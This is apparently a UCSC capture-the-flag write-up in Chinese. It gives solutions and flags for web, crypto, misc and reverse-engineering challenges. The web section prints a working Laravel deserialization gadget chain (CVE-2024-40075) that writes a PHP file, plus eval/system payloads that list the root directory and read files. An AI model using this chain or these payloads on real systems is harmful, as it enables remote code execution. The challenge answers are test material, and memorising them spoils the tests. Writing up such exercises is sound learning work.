UCSCCTF-WP

WEB

ezLaravel-ucsc(Laravel框架漏洞)

CVE-2024-40075，参考文章Laravel v11.x PHP反序列化漏洞分析(CVE-2024-40075)-先知社区

在routes/web.php中找到源码如下

Route::get('/', function (\Illuminate\Http\Request $request) {

    $str = base64_decode($request->input("str"));
    if(preg_match("/pearcmd/i",$str)){
        exit("这个不行");
    }
    unserialize($str);
    return "CTF";
});

那么就要找到链子，参考文章中的pop链

<?php
namespace Termwind\ValueObjects{
    Class Styles{
        private array $textModifiers;
        private array $properties;
        public function __construct(){
            $this->textModifiers = ["file_put_contents"];
            $this->properties = ["styles"=>"<?php phpinfo();?>", "parentStyles"=>0];
        }
    }
}
namespace Termwind\Components{
    use Termwind\ValueObjects\Styles;
    abstract Class Element{
        protected string $content;
        protected Styles $styles;
        public function __construct()
        {
            $this->content = 'testtesttest.php';
            $this->styles = new Styles();
        }
    }
    Class Hr extends Element{}
}
namespace Psy\Readline\Hoa{
    use Termwind\Components\Hr;

    abstract Class Stream{
        protected $_bucket;
        public function __construct(){
            $this->_bucket = [new Hr()];
        }
    }
    Class FileRead extends Stream {}
}

namespace Monolog\Handler{
    use Psy\Readline\Hoa\FileRead;
    Class GroupHandler{
        protected array $handlers;
        public function __construct(){
            $this->handlers = [new FileRead()];
        }
    }
}

namespace {
    $obj = new Monolog\Handler\GroupHandler();
    echo base64_encode(serialize($obj));
}

注意这里如果是写一句话木马写上去有点问题，直接读文件就行

<?php phpinfo();?>
<?php eval('system(\"ls /\")');?>
<?php eval('system(\"cat /flag.sh\")');?>

CRYPTO

XR4-ucsc

import base64
import random

def init_sbox(key):
    s_box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box

def decrypt(cipher, box):
    res = []
    i = j = 0
    cipher_bytes = base64.b64decode(cipher)
    for s in cipher_bytes:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(s ^ k))
    return ''.join(res)

# Step 1: Decrypt the ciphertext to obtain the seed 'a'
ciphertext = "MjM184anvdA="
key = "XR4"
box = init_sbox(key)
a = decrypt(ciphertext, box.copy())  # Use a copy to avoid modifying the original box
seed_num = int(a)
print(f"Decrypted seed: {seed_num}")

# Step 2: Construct the data array from the transposed matrix
transposed_matrix = [
    [1, 111, 38, 110, 95, 44],
    [11, 45, 58, 39, 84, 1],
    [116, 19, 113, 60, 91, 118],
    [33, 98, 38, 57, 10, 29],
    [68, 52, 119, 56, 43, 125],
    [32, 32, 7, 26, 41, 41]
]

# Transpose the matrix to get the original matrix
original_matrix = [[row[i] for row in transposed_matrix] for i in range(6)]
data = []
for row in original_matrix:
    data.extend(row)

# Step 3: Generate the flag using the seed and data
def generate_flag(seed, data):
    random.seed(seed)
    flag = []
    for i in range(36):
        rand_val = random.random() * 10000
        rand_str = f"{rand_val:.10f}"
        first_two = rand_str[:2]
        if first_two.isdigit():
            num = int(first_two)
        else:
            num = 0  # Fallback (should not occur with correct seed)
        xor = num ^ data[i]
        flag.append(chr(xor))
    return ''.join(flag)

flag = generate_flag(seed_num, data)
print(f"Flag: {flag}")

flag{c570ee41-8b09-11ef-ac4a-a4b1c1c5a2d2}

essential-ucsc

from sympy import nextprime, prevprime
import math
from math import gcd
from Crypto.Util.number import inverse, long_to_bytes

number2 = 20163906788220322201451577848491140709934459544530540491496316478863216041602438391240885798072944983762763612154204258364582429930908603435291338810293235475910630277814171079127000082991765275778402968190793371421104016122994314171387648385459262396767639666659583363742368765758097301899441819527512879933947

# 估算a的近似值
approx_a = math.isqrt(number2 // 325)

# 搜索附近的a值
found = False
for delta in range(-1000, 1000):
    a = approx_a + delta
    p = nextprime(13 * a)
    q = prevprime(25 * a)
    if p * q == number2:
        found = True
        break

if not found:
    raise ValueError("Failed to find a")

phi = (p - 1) * (q - 1)

# 解密第一个密文
c1 = 6624758244437183700228793390575387439910775985543869953485120951825790403986028668723069396276896827302706342862776605008038149721097476152863529945095435498809442643082504012461883786296234960634593997098236558840899107452647003306820097771301898479134315680273315445282673421302058215601162967617943836306076
e1 = 6035830951309638186877554194461701691293718312181839424149825035972373443231514869488117139554688905904333169357086297500189578624512573983935412622898726797379658795547168254487169419193859102095920229216279737921183786260128443133977458414094572688077140538467216150378641116223616640713960883880973572260683

g1 = gcd(e1, phi)
if g1 != 1:
    raise ValueError("e1 and phi are not coprime")
d1 = inverse(e1, phi)
number3 = pow(c1, d1, number2)
flag_part1 = long_to_bytes(number3).decode('utf-8')
print(flag_part1)
# 解密第二个密文
c2 = 204384474875628990804496315735508023717499220909413449050868658084284187670628949761107184746708810539920536825856744947995442111688188562682921193868294477052992835394998910706435735040133361347697720913541458302074252626700854595868437809272878960638744881154520946183933043843588964174947340240510756356766
e2 = 0xe18e  # 57870

g2 = gcd(e2, phi)
if g2 != 1:
    raise ValueError("e2 and phi are not coprime")
d2 = inverse(e2, phi)
number4 = pow(c2, d2, number2)
flag_part2 = long_to_bytes(number4).decode('utf-8')

flag = flag_part1 + flag_part2
print(flag)

flag{75811c6d95770d

MERGE_ECC–ucsc

from sage.all import *

# Part 1 输入值
N = 8186762541745429544201163537921168767557829030115874801599552603320381728161132002130533050721684554609459754424458805702284922582219134865036743485620797
a_part1 = 1495420997701481377470828570661032998514190598989197201754979317255564287604311958150666812378959018880028977121896929545639701195491870774156958755735447
b_part1 = 5991466901412408757938889677965118882508317970919705053385317474407117921506012065861844241307270755999163280442524251782766457119443496954015171881396147
P_coords = (6053058761132539206566092359337778642106843252217768817197593657660613775577674830119685211727923302909194735842939382758409841779476679807381619373546323, 7059796954840479182074296506322819844555365317950589431690683736872390418673951275875742138479119268529134101923865062199776716582160225918885119415223226)
cipher0_coords = (4408587937721811766304285221308758024881057826193901720202053016482471785595442728924925855745045433966244594468163087104593409425316538804577603801023861, 5036207336371623412617556622231677184152618465739959524167001889273208946091746905245078901669335908442289383798546066844566618503786766455892065155724816)
cipher1_coords = (2656427748146837510897512086140712942840881743356863380855689945832188909581954790770797146584513962618190767634822273749569907212145053676352384889228875, 4010263650619965046904980178893999473955022015118149348183137418914551275841596653682626506158128955577872592363930977349664669161585732323838763793957500)
cipher2_coords = (1836350123050832793309451054411760401335561429787905037706697802971381859410503854213212757333551949694177845513529651742217132039482986693213175074097638, 1647556471109115097539227566131273446643532340029032358996281388864842086424490493200350147689138143951529796293632149050896423880108194903604646084656434)

# Part 2 输入值
p_part2 = 839252355769732556552066312852886325703283133710701931092148932185749211043
a_part2 = 166868889451291853349533652847942310373752202024350091562181659031084638450
b_part2 = 168504858955716283284333002385667234985259576554000582655928538041193311381
P_part2_coords = (547842233959736088159936218561804098153493246314301816190854370687622130932, 259351987899983557442340376413545600148150183183773375317113786808135411950)
Q_part2_coords = (52509027983019069214323702207915994504051708473855890224511139305828303028, 520507172059483331872189759719244369795616990414416040196069632909579234481)

# 处理 Part 1
# 定义 Part 1 的椭圆曲线
E_part1 = EllipticCurve(GF(N), [a_part1, b_part1])
P = E_part1(*P_coords)
cipher = [E_part1(*cipher0_coords), E_part1(*cipher1_coords), E_part1(*cipher2_coords)]

# 计算离散对数以恢复 n[i]，范围为 1 到 2^20
n = []
for c in cipher:
    ni = P.discrete_log(c, bounds=(1, 2^20))
    n.append(ni)

# 将 n[i] 转换为十六进制并拼接
part1 = ''.join(hex(ni)[2:] for ni in n)

# 处理 Part 2
# 定义 Part 2 的椭圆曲线
E_part2 = EllipticCurve(GF(p_part2), [a_part2, b_part2])
P_part2 = E_part2(*P_part2_coords)
Q_part2 = E_part2(*Q_part2_coords)

# 计算离散对数以恢复 key
order = P_part2.order()
key = P_part2.discrete_log(Q_part2, order=order)

# 构造最终 flag
flag = "flag{" + part1 + "-" + str(key) + "}"
print("Recovered flag:", flag)

MISC

three-ucsc

第一部分按照名字提示盲水印解密

part1:8f02d3e7

第二部分先二进制转十六进制，再转ASCII码如下

LS4uLi4tIC0uLS4gLiAtLS0uLiAtLS0tLiAtLi4uLi0gLi4uLi0gLS4uIC0uLi4uIC0uLi4gLS4uLi4tIC0tLS4uIC4uLi0tIC0tLS0tIC4gLS4uLi4t

base64解密如下

-....- -.-. . ---.. ----. -....- ....- -.. -.... -... -....- ---.. ...-- ----- . -....-

摩斯解密如下

-CE89-4D6B-830E-
注意为小写即
-ce89-4d6b-830e-

第三部分看流量，找到

一个个试，发现thinkbell正确，最后一部分为5d0cb5695077

合起来为

flag{8f02d3e7-ce89-4d6b-830e-5d0cb5695077}

RE

easy_re-ucsc

# 原始字符串
Str = "n=<;:h2<'?8:?'9hl9'h:l>'2>>2>hk=>;:?"
# XOR密钥
v7 = 10

# 对字符串进行XOR操作
def xor_decrypt(Str, key):
    decrypted = ""
    for char in Str:
        decrypted += chr(ord(char) ^ key)
    return decrypted

# 解密字符串并打印
decrypted_str = xor_decrypt(Str, v7)
print("解密后的字符串:", decrypted_str)

flag{d7610b86-5205-3bf3-b0f4-84484ba74105}

simplere-ucsc

flag{fc03040506}

EZ_debug-ucsc

def rc4_ksa(key):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s

def rc4_prga(s, data):
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        k = s[(s[i] + s[j]) % 256]
        out.append(byte ^ k)
    return out

key = b"UCSC"  # [85, 67, 83, 67]
ciphertext = bytes([
    0xF8, 0x3C, 0x7A, 0x0E, 0xEC, 0x83, 0x9B, 0x08,
    0x6A, 0x5F, 0xC8, 0x58, 0x38, 0xA8, 0x0E, 0x3F,
    0x22, 0x5F, 0x1B, 0x81, 0x39, 0x1E, 0x8A, 0xAB,
    0xB1, 0xE9, 0x75, 0x64, 0x7A, 0x30, 0x9F, 0x64,
    0x90, 0xBD, 0x7B, 0xAB
])

s = rc4_ksa(key)
plaintext = rc4_prga(s.copy(), ciphertext)
print(plaintext.decode('ascii', errors='ignore'))

flag{709e9bdd-0858-9750-8c37-9b135b31f16d}

tshark.exe -r flag.pcap -T fields -e usb.capdata >usbdata.txt